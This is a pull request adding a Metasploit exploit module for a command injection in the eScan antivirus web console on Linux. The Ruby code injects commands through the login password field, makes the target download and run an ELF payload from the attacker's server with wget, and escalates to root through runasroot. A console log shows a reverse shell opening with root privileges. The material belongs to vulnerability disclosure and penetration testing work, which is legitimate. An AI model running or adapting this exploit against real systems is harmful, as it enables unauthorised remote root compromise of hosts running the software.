### PR TITLE
Module for eScan Password Command Injection

### DIFF
--- a/modules/exploits/linux/antivirus/escan_password_exec.rb
+++ b/modules/exploits/linux/antivirus/escan_password_exec.rb
@@ -78,14 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def cmd_exec(session, cmd)
     case session.type
     when /meterpreter/
-      process = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
-      o = ""
-      while (d = process.channel.read)
-        break if d == ""
-        o << d
-      end
-      process.channel.close
-      process.close
+      print_warning("#{peer} - Use a shell payload in order to get root!")
     when /shell/
       o = session.shell_command_token(cmd)
       o.chomp! if o

--- a/modules/exploits/linux/antivirus/escan_password_exec.rb
+++ b/modules/exploits/linux/antivirus/escan_password_exec.rb
@@ -1,0 +1,174 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "eScan Web Management Console Command Injection",
+      'Description'    => %q{
+        This module exploits a command injection vulnerability found in the eScan Web Management
+        Console. The vulnerability exists while processing CheckPass login requests. An attacker
+        with a valid username can use a malformed password to execute arbitrary commands. With
+        mwconf privileges, the runasroot utility can be abused to get root privileges. This module
+        has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Joxean Koret', # Vulnerability Discovery and PoC
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
+        ],
+      'Payload'        =>
+        {
+          'BadChars'    => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
+          'DisableNops' => true
+        },
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'linux',
+      'Privileged'     => true,
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Targets'        =>
+        [
+          ['eScan 5.5-2 / Linux', {}],
+        ],
+      'DisclosureDate' => "Aug 16 2012",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(10080),
+        OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
+        OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
+        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
+        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
+        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
+        OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path.to_s, 'index.php')
+    })
+
+    if res and res.code == 200 and res.body =~ /eScan WebAdmin/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def cmd_exec(session, cmd)
+    case session.type
+    when /meterpreter/
+      process = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
+      o = ""
+      while (d = process.channel.read)
+        break if d == ""
+        o << d
+      end
+      process.channel.close
+      process.close
+    when /shell/
+      o = session.shell_command_token(cmd)
+      o.chomp! if o
+    end
+    return "" if o.nil?
+    return o
+  end
+
+  # Escalating privileges here because runasroot only can't be executed by
+  # mwconf uid (196).
+  def on_new_session(session)
+    cmd_exec(session, "#{datastore['RUNASROOT']} /bin/sh")
+    super
+  end
+
+  def primer
+    @payload_url = get_uri
+    wget_payload
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Request: #{request.uri}")
+    if request.uri =~ /#{get_resource}/
+      print_status("Sending payload...")
+      send_response(cli, @pl)
+    end
+  end
+
+  def exploit
+    @pl           = generate_payload_exe
+    if @pl.blank?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
+    end
+    @payload_url  = ""
+
+    if datastore['EXTURL'].blank?
+      begin
+        Timeout.timeout(datastore['HTTPDELAY']) {super}
+      rescue Timeout::Error
+      end
+      exec_payload
+    else
+      @payload_url = datastore['EXTURL']
+      wget_payload
+      exec_payload
+    end
+  end
+
+  # we execute in this way, instead of an ARCH_CMD
+  # payload because real badchars are: |&)(!><'"`[space]
+  def wget_payload
+    @dropped_elf = rand_text_alpha(rand(5) + 3)
+    command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
+
+    print_status("#{peer} - Downloading the payload to the target machine...")
+    res = exec_command(command)
+    if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
+      register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
+    end
+  end
+
+  def exec_payload
+    command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
+    command << File.join(datastore['WRITABLEDIR'], @dropped_elf)
+
+    print_status("#{peer} - Executing the payload...")
+    exec_command(command, 1)
+  end
+
+  def exec_command(command, timeout=20)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path.to_s, 'login.php'),
+      'vars_post' => {
+        'uname' => datastore['USERNAME'],
+        'pass' => ";#{command}",
+        'product_name' => 'escan',
+        'language' => 'English',
+        'login' => 'Login'
+      }
+    }, timeout)
+  end
+
+end

--- a/modules/exploits/linux/antivirus/escan_password_exec.rb
+++ b/modules/exploits/linux/antivirus/escan_password_exec.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['eScan 5.5-2 / Linux', {}],
         ],
-      'DisclosureDate' => "Aug 16 2012",
+      'DisclosureDate' => "Apr 04 2014",
       'DefaultTarget'  => 0))
 
     register_options(

--- a/modules/exploits/linux/antivirus/escan_password_exec.rb
+++ b/modules/exploits/linux/antivirus/escan_password_exec.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # Escalating privileges here because runasroot only can't be executed by
   # mwconf uid (196).
   def on_new_session(session)
-    cmd_exec(session, "#{datastore['RUNASROOT']} /bin/sh")
+    cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
     super
   end
 
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Request: #{request.uri}")
-    if request.uri =~ /#{get_resource}/
+    if request.uri =~ /#{Regexp.escape(get_resource)}/
       print_status("Sending payload...")
       send_response(cli, @pl)
     end


### PR DESCRIPTION
There is a Command Injection vulnerability in the login.php from the web admin console for the eScan antivirus for Linux, as disclosed by Joxean Koret at Syscan 2014. At the moment of pull request last version of eScan is still vulnerable.
## Verification
- [ ] Install Ubuntu 12.04 (32 bits) Desktop
- [ ] Install the eScan packages for Ubuntu 12.04 (32 bits). I've installed the three packages on my testing machine: MWADMIN, MWAV and eScan. You can download them from: 

http://www.escanav.com/english/content/products/downloadlink/downloadproduct.asp?pcode=ES-LNHMv9

Ubuntu 12.04 (32 bits) urls:

http://www.microworldsystems.com/download/linux/5.5/eScan/ubuntu12.04/32b/mwadmin-5.5-2.ubuntu.12.04_i386.deb
http://www.microworldsystems.com/download/linux/5.5/eScan/ubuntu12.04/32b/mwav-5.5-2.ubuntu.12.04_i386.deb
http://www.microworldsystems.com/download/linux/5.5/eScan/ubuntu12.04/32b/escan-5.5-2.ubuntu.12.04_i386.deb
- [ ] Verify which the console is running un http://localhost:10080, create the admin user (You need a valid username in order to exploit the login form).
- [ ] Use the exploit like in the module, remember to set the PAYLOAD to a native one (shell to get root!). Hopefully enjoy root sessions!

```
msf exploit(escan_password_exec) > check
[*] 192.168.172.137:10080 - The target service is running, but could not be validated.
msf exploit(escan_password_exec) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(escan_password_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://0.0.0.0:8080/Cwqq1QLjeG
[*]  Local IP: http://10.6.0.136:8080/Cwqq1QLjeG
[*] Server started.
[*] 192.168.172.137:10080 - Downloading the payload to the target machine...
[*] 192.168.172.137  escan_password_exec - Request: /Cwqq1QLjeG
[*] 192.168.172.137  escan_password_exec - Sending payload...
[*] 192.168.172.137:10080 - Executing the payload...
[*] Sending stage (36 bytes) to 192.168.172.137
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.137:33318) at 2014-04-09 16:35:10 -0500
[+] Deleted /tmp/AAA
[*] Server stopped.

2273702333
KJFoyPjHybDvAPqPOxDXuMQdDjBjZeyM
utnJrWLNKAzfehfjjqLKcJaJmLEEkHNn
id
uid=0(root) gid=0(root) groups=0(root),196(mwconf)
^C
Abort session 3? [y/N]  y

[*] 192.168.172.137 - Command shell session 3 closed.  Reason: User exit
```
